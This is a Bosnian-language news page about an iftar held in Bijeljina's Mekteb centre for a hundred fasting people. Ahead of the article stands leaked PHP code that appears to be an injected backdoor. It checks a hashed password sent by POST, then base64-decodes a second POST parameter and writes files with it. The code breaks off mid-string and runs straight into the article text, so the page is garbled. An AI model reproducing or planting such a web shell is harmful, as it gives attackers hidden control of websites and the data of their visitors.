function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Iftar za stotinu postača u Mektebskom centru u Bijeljini - Medžlis Islamske zajednice Bijeljina

Iftar za stotinu postača u Mektebskom centru u Bijeljini

Iftar za stotinu postača u Mektebskom centru u Bijeljini

Po pokroviteljstvom Crvenog polumjeseca Ujedinjenih Arapskih Emirata, Ured za BiH, a u organizaciji Dobrovoljnog društva “Merhamet” Bijeljina, u petak 19. jula u Mektebskom centru u Bijeljini upriličen je iftar za stotinu postača. Domaćin je bio Medžlis Islamske zajednice, a pripremu hrane i pića za postače preuzeli su mladi članovi sekcija Mektebskog centra. Tako su dodatno prikupili novac za odlazak u Tursku i svoj nastup u Adapazaru nakon Ramazana.

OLYMPUS DIGITAL CAMERA

            Azra Medinić, predsjednica bijeljinskog “Merhameta”, kazala je da je ovo prvi od tri iftara koje je ova organizacija obezbijedila tokom Ramazana. U ime domaćina, postačima se obratio glavni bijeljinski imam Samir ef. Camić. Zahvalio se pokrovitelju, organizatoru i mladima, istaknuvši da su ramazanski iftari prilika za druženje i izgradnju džemata.

OLYMPUS DIGITAL CAMERA

            Uz brojne, uglavnom mlađe džematlije i goste iz susjednih medžlisa, iftaru su prisustvovali i prigodno govorili Ramiz Salkić (SDA), potpredsjednik Narodne skupštine RS, Mahmoud Ali, direktor Ureda Crvenog polumjeseca UAE u BiH, te profesor Sead ef. Seljubac, zamjenik muftije tuzlanskog. Profesor Seljubac je nakon teravih namaza održao i prigodnu hutbu u Atik sultan Sulejmanovoj džamiji, gdje je govorio o vrijednostima Ramazana i predstojećem popisu stanovništva.